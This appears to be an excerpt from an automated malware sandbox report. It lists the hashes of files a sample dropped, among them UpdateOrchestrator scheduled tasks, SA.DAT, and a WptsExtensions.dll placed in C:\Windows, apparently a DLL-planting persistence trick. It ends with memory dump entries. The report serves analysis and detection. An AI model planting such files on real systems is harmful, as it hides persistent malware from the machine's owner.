C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
7d612892b20e70250dbd00d0cdd4f09b

SHA1
63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

SHA256
727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

SHA512
f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
0b990e24f1e839462c0ac35fef1d119e

SHA1
9e17905f8f68f9ce0a2024d57b537aa8b39c6708

SHA256
a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

SHA512
c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

Download Submit
C:\Windows\Tasks\SA.DAT

Filesize
6B

MD5
f1a6cd5adaab953a6764ea364e17bfb8

SHA1
c99a1eb2d8974a667d2e0bc2dc1efcbe0ef23387

SHA256
12dc5ccd7fecafe070976a1916e9672e3d53085633c86957aee305ccc584184c

SHA512
da8cc20e0c0f48a975f97fc133ba4e99de6771163465d03f1cc0e3019fedfe0afa99799b9e343610a941218b19c9117b12e4ab86911d04c2908b6db44523e84c

Download Submit
C:\Windows\Tasks\SA.DAT

Filesize
6B

MD5
f1a6cd5adaab953a6764ea364e17bfb8

SHA1
c99a1eb2d8974a667d2e0bc2dc1efcbe0ef23387

SHA256
12dc5ccd7fecafe070976a1916e9672e3d53085633c86957aee305ccc584184c

SHA512
da8cc20e0c0f48a975f97fc133ba4e99de6771163465d03f1cc0e3019fedfe0afa99799b9e343610a941218b19c9117b12e4ab86911d04c2908b6db44523e84c

Download Submit
C:\Windows\Tasks\SA.DAT

Filesize
6B

MD5
f1a6cd5adaab953a6764ea364e17bfb8

SHA1
c99a1eb2d8974a667d2e0bc2dc1efcbe0ef23387

SHA256
12dc5ccd7fecafe070976a1916e9672e3d53085633c86957aee305ccc584184c

SHA512
da8cc20e0c0f48a975f97fc133ba4e99de6771163465d03f1cc0e3019fedfe0afa99799b9e343610a941218b19c9117b12e4ab86911d04c2908b6db44523e84c

Download Submit
C:\Windows\WptsExtensions.dll

Filesize
155KB

MD5
ee258b5f7dd1071109a1e3fe65c73c1a

SHA1
02cacafc9f5bc1482a4c5197437cd6e1b77e02ce

SHA256
61ad4d5b477d2b180bc3ae9f3e13d481dd927bf87c0d865aa0e3a21954d20c4f

SHA512
7e6b96f67bd180f50940225c49ae3dcf54a208ee99523ea31ced951d681c1c5846aa18e4b748a8ed92b21c668a59379a7b3a11fa6ca1f9704f46a4c32bb27f9f

Download Submit
C:\Windows\Wptsextensions.dll

Filesize
155KB

MD5
ee258b5f7dd1071109a1e3fe65c73c1a

SHA1
02cacafc9f5bc1482a4c5197437cd6e1b77e02ce

SHA256
61ad4d5b477d2b180bc3ae9f3e13d481dd927bf87c0d865aa0e3a21954d20c4f

SHA512
7e6b96f67bd180f50940225c49ae3dcf54a208ee99523ea31ced951d681c1c5846aa18e4b748a8ed92b21c668a59379a7b3a11fa6ca1f9704f46a4c32bb27f9f

Download Submit
memory/1080-186-0x00000259832A0000-0x00000259832C0000-memory.dmp

Filesize
128KB

Download
memory/1080-191-0x0000000180000000-0x0000000180587000-memory.dmp

Filesize
5.5MB

Download
memory/1080-192-0x00000259833F0000-0x0000025983430000-memory.dmp

Filesize
256KB

Download
memory/1080-190-0x0000000180000000-0x0000000180587000-memory.dmp

Filesize
5.5MB

Download
memory/1080-189-0x0000000180000000-0x0000000180587000-memory.dmp

Filesize
5.5MB

Download
memory/1080-188-0x0000000180000000-0x0000000180587000-memory.dmp

Filesize
5.5MB

Download
memory/1080-187-0x0000000180000000-0x0000000180587000-memory.dmp

Filesize
5.5MB

Download
memory/1080-176-0x0000000180000000-0x0000000180587000-memory.dmp

Filesize
5.5MB

Download
memory/1080-235-0x0000000180000000-0x0000000180587000-memory.dmp

Filesize
5.5MB

Download
memory/1080-236-0x0000025983430000-0x0000025983450000-memory.dmp

Filesize
128KB

Download
memory/1080-237-0x0000025983430000-0x0000025983450000-memory.dmp

Filesize
128KB

Download